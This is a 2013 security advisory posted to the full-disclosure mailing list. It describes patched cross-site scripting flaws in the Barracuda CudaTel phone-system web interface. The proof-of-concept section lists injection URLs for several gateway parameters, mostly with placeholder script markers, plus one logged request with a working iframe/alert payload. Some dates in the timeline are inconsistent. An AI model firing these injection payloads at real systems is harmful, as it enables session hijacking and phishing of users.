'[Full-disclosure] Barracuda CudaTel 2.6.02.04 - Multiple Web Vulnerabilities'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] Barracuda CudaTel 2.6.02.04 - Multiple Web Vulnerabilities
From:       Vulnerability Lab <research () vulnerability-lab ! com>
Date:       2013-06-27 23:50:26
Message-ID: 51CCCFC2.3000207 () vulnerability-lab ! com
[Download RAW message or body]

Title:
======
Barracuda CudaTel 2.6.02.04 - Multiple Web Vulnerabilities


Date:
=====
2013-06-25


References:
===========
http://vulnerability-lab.com/get_content.php?id=778

BARRACUDA NETWORK SECURITY ID: BNSEC-811


VL-ID:
=====
778


Common Vulnerability Scoring System:
====================================
2.5


Introduction:
=============
Designed to enable seamless voice and video communication, the CudaTel Communication Server is \
an easy-to-use,  affordable, next-generation phone system for businesses. CudaTel Communication \
Server s enterprise-class  feature set includes Voice over IP (VoIP) PBX services, \
conferencing, follow-me, automated attendant services,  and more, controlled by an easy-to-use \
Web interface. CudaTel Communication Server is compatible with any SIP  device and provider, \
and can be pre-configured for use with both analog and digital telephone networks. Powerful,  \
Complete Solution With an expansive feature set and and no per user or phone licensing fees, \
the CudaTel  Communication Server is equipped and priced for organizations of any size. Native \
High Definition audio support  and integrated phone line (TDM) hardware produces an \
unparalleled audio experience. VOIP encryption protects calls  from hackers and digital \
eavesdroppers.

(Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple client side vulnerabilities in \
the Barracuda Networks CudaTel v2.6.002.040 appliance application.


Report-Timeline:
================
2012-11-27:	Researcher Notification & Coordination (Benjamin Kunz Mejri)
2012-11-28:	Vendor Notification (Barracuda Networks Security - Bug Bounty Program)
2012-12-01:	Vendor Response/Feedback (Barracuda Networks Security - Bug Bounty Program)
2013-03-14:	Vendor Fix/Patch (Barracuda Networks Developer) [Coordination: Dave Farrow]
2012-06-25:	Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
Multiple client side input validation vulnerabilities are detected  in the Barracuda Networks \
CudaTel v2.6.002.040 appliance application. The non-persistent vulnerabilities allows an \
attacker (remote) to manipulate client side application to browser requests.

The vulnerability (client side) is located in the siplist and list module when processing to \
request manipulated bbx_provider_gateway_name,  bbx_provider_gateway_username or \
bbx_provider_gateway_host parameter listing. 

Exploitation of the vulnerability requires medium application user interaction. Successful \
exploitation of the vulnerability results in  client side phishing, client side session \
hijacking, client side external redirects to malware or evil websites and client side module  \
context manipulation(cache). 


Vulnerable Module(s):
				[+] siplist - Listing
				[+] list - Listing

Vulnerable Parameter(s):
				[+] bbx_provider_gateway_name
				[+] bbx_provider_gateway_username
				[+] bbx_provider_gateway_host


Proof of Concept:
=================
The client side input validation vulnerabilities can be exploited by remote attackers without \
required application user account and with  medium or high required user interaction. For \
demonstration or reproduce ...

Path: 
gui/gateway/siplist
gui/gateway/list


Parameter: 
undefined, bbx_provider, rows, page & searchstring

Values: 
bbx_provider_gateway_name,  bbx_provider_gateway_username & bbx_provider_gateway_host

Review: List

<pre>--- 
count: 1
list: 
  - 
    
bbx_domain_id: 6
bbx_extension_block_begin: 2008
bbx_extension_block_end: 2008
bbx_extension_id: 26
bbx_extension_id_primary: 26
bbx_extension_rcd: 2012-11-26 15:58:45.413912
bbx_extension_rpd: 2012-11-26 15:58:45.413912
bbx_extension_value: 2008
bbx_queue_id: 12
flag_auto_provision: 0
flag_external: 0
flag_locked: 0
flag_primary: 1
flag_standalone: 1
flag_super: 0
flag_voicemail: 0&#8203;&#8203;&#8203;&#8203;&#8203;
show_name: "\"><[PERSISTENT INJECTED SCRIPT CODE!]>"
sort_name: "\"><[PERSISTENT INJECTED SCRIPT CODE!]>"&#8203;&#8203;&#8203;&#8203;&#8203;
type: queue
page: 1
rows: 25
</pre>



Review: SipList

<pre>--- 
count: 4

page: 1
rows: 30

siplist: 
  - 
    
bbx_provider_gateway_flag_inbound: 1
bbx_provider_gateway_flag_outbound: 1
bbx_provider_gateway_host: \
&#8203;&#8203;&#8203;&#8203;&#8203;"\">/\"/'\"&#8203;&#8203;&#8203;&#8203;&#8203;<[PERSISTENT \
                INJECTED SCRIPT CODE!]>"
bbx_provider_gateway_id: 22
bbx_provider_gateway_name: "\"><[PERSISTENT INJECTED SCRIPT CODE!]>"
bbx_provider_gateway_port: 5060
bbx_provider_gateway_state: REFRESH
bbx_provider_gateway_username: "\">/\"/'\"<[PERSISTENT INJECTED SCRIPT CODE!]>"
bbx_provider_name: Generic SIP
  - 
bbx_provider_gateway_flag_inbound: 1
bbx_provider_gateway_flag_outbound: 1
bbx_provider_gateway_host: <[PERSISTENT INJECTED SCRIPT CODE!]")< 
bbx_provider_gateway_id:="" 23="" 
bbx_provider_gateway_name:="" <[PERSISTENT INJECTED SCRIPT CODE!];)" 
<="" <iframe="">%20%20%20%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <
bbx_provider_gateway_port: <[PERSISTENT INJECTED SCRIPT CODE!]")<
bbx_provider_gateway_state: NOREG
bbx_provider_gateway_username: <[PERSISTENT INJECTED SCRIPT CODE!]")<
bbx_provider_name: PSTN Gateway
  - 
bbx_provider_gateway_flag_inbound: 1
bbx_provider_gateway_flag_outbound: 1
bbx_provider_gateway_host: "\"<h1>test</h1>"
bbx_provider_gateway_id: 21
bbx_provider_gateway_name: \\"<[PERSISTENT INJECTED SCRIPT CODE!]>
bbx_provider_gateway_port: 5060
bbx_provider_gateway_state: ~
bbx_provider_gateway_username: "\"<[PERSISTENT INJECTED SCRIPT CODE!]>"
bbx_provider_name: Generic SIP
  - 
bbx_provider_gateway_flag_inbound: 1
bbx_provider_gateway_flag_outbound: 1
bbx_provider_gateway_host: test.com
bbx_provider_gateway_id: 20
bbx_provider_gateway_name: test
bbx_provider_gateway_port: 5060
bbx_provider_gateway_state: NOREG
bbx_provider_gateway_username: test
bbx_provider_name: Generic SIP
</pre></body></html></iframe></[PERSISTENT INJECTED SCRIPT CODE!]")<></iframesrc=a></pre>


PoC:

http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?
_=1354065786075&undefined=%3E%22%3C%3C[PERSISTENT INJECTED SCRIPT \
CODE!]%20%3C&rows=10&page=1&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=


http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?
_=1354065786075&undefined=&rows=%3E%22%3C%3C[PERSISTENT INJECTED SCRIPT \
CODE!]%20%3C&page=1&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=


http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?
_=1354065786075&undefined=&rows=10&page=%3E%22%3C%3C[PERSISTENT INJECTED SCRIPT \
CODE!]%20%3C&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=


http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?
_=1354065786075&undefined=&rows=10&page=1&sortby=bbx_provider_gateway_name=%3C[PERSISTENT \
INJECTED SCRIPT CODE!]&sortorder=asc&searchstring=


http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?
_=1354065786075&undefined=&rows=10&page=1&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=%3C[PERSISTENT \
INJECTED SCRIPT CODE!]

http://cudatel.ptest.cudasvc.com/gui/gateway/list?
_=1354065786075&undefined=%3E%22%3C%3C[PERSISTENT INJECTED SCRIPT \
CODE!]%20%3C&rows=10&page=1&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=


http://cudatel.ptest.cudasvc.com/gui/gateway/list?
_=1354065786075&undefined=&rows=10&page=1&sortby=bbx_provider_gateway_name=[PERSISTENT INJECTED \
SCRIPT CODE!]%20%3C&sortorder=asc&searchstring=


ALL:
cudatel.ptest.cudasvc.com/gui/gateway/siplist?_=1354065786075&undefined=<[PERSISTENT INJECTED \
SCRIPT CODE!]<&rows= <[PERSISTENT INJECTED SCRIPT CODE!]<&page=<[PERSISTENT INJECTED SCRIPT \
CODE!]<&sortby=bbx_provider_gateway_name=<[PERSISTENT INJECTED SCRIPT CODE!]<

cudatel.ptest.cudasvc.com/gui/gateway/list?_=1354065786075&undefined=<[PERSISTENT INJECTED \
SCRIPT CODE!]<&rows= <[PERSISTENT INJECTED SCRIPT CODE!]<&page=<[PERSISTENT INJECTED SCRIPT \
CODE!]<&sortby=bbx_provider_gateway_name=<[PERSISTENT INJECTED SCRIPT CODE!]<


Request(s):

2:30:07.550[851ms][total 9418ms] Status: 200[OK]
GET http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?_=1354065786075&undefined=%3Ciframe%20src=a%3E
 %20%20%20%20%22%3E%3Ciframe%20src=a%20onload=alert(%22VL%22)%20%3C&rows=%3Ciframe%20src=a%3E%20%20%20%20%22%3E%3Ciframe%20src=
 a%20onload=alert(%22VL%22)%20%3C
&page=%3Ciframe%20src=a%3E%20%20%20%20%22%3E%3Ciframe%20src=a%20onload=alert(%22VL%22)%20%3C&sortby=bbx_provider_gateway_name=
 %3Ciframe%20src=a%3E%20%20%20%20
%22%3E%3Ciframe%20src=a%20onload=alert(%22VL%22)%20%3C&sortorder=asc&searchstring=%3Ciframe%20src=a%3E%20%20%20%20%22%3E%3Ciframe
 %20src=a%20onload=alert(%22VL
%22)%20%3C Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[1833] \
Mime Type[text/html]  Request Header:
      Host
[cudatel.ptest.cudasvc.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0]
      Accept[text/html,application/xhtml
+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      DNT[1]
      
Connection[keep-alive]
      Cookie[cookietest=1; bps_session=86bd13e59f90e0f8670a547c0d0ce57e710393d6]
   Response Header:
      Date[Wed, 28 Nov 2012 01:30:08 GMT]

Server[BarracudaHTTP 2.0/2.2.10 (Unix) mod_auth_pgsql/2.0.3 \
mod_fastcgi/mod_fastcgi-SNAP-0811090952 mod_ssl/2.2.10  OpenSSL/0.9.8x mod_perl/2.0.2 \
Perl/v5.8.8]

Vary[Content-Type]
      Set-Cookie[bps_session=86bd13e59f90e0f8670a547c0d0ce57e710393d6; path=/]
      Content-Length[1833]
      Cache-Control[must-revalidate]

Expires[Thu, 28 Nov 2013 01:30:08 GMT]
      Keep-Alive[timeout=5, max=100]
      Connection[Keep-Alive]
      Content-Type[text/html]


Reference(s):
cudatel.ptest.cudasvc.com/gui/gateway/siplist
cudatel.ptest.cudasvc.com/gui/gateway/list


Solution:
=========
2013-03-14:	Vendor Fix/Patch (Barracuda Networks Developer) [Coordination: Dave Farrow]

Note: The upgrade is available to all customer of the appliance module and can be done \
automatic or manually in the customer center of barracuda networks.


Risk:
=====
The security risk of the (multiple) client side input validation vulnerabilities in the siplist \
and list module are estimated as medium.


Credits:
========
Vulnerability Laboratory [Research Team]  -    Benjamin Kunz Mejri (bkm@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability-Lab disclaims all warranties,  either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or \
its suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business  profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some  states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation  may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases  or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - \
                www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - \
                research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - \
                news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - \
                youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - \
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory.  Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other  media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and  other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed),  modify, use \
or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to \
get a permission.

    				   	Copyright © 2013 | Vulnerability Laboratory



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic